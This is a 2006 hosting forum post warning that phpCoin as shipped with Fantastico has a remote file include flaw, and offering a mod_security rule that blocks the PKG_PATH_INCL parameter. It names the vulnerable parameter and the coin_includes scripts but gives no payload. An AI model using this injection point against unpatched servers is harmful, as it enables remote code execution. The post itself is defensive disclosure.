The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

SECURITY ISSUE: phpCoin Remote File Include Vuln

Discussion in 'Security' started by cmeisinger, Aug 26, 2006.

  1. cmeisinger

    cmeisinger Registered

    Nov 29, 2004
    Likes Received:
    Trophy Points:
    The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.

    Please see:

    Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your modsecurty configuration.

    SecFilter "PKG_PATH_INCL"

    That should take care of it until Fantastico/PHPCoin releases an update.

    Chris Meisinger
    WingSix Hosting

    edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.

    Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file, now i'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
    #1 cmeisinger, Aug 26, 2006
    Last edited: Aug 26, 2006

Share This Page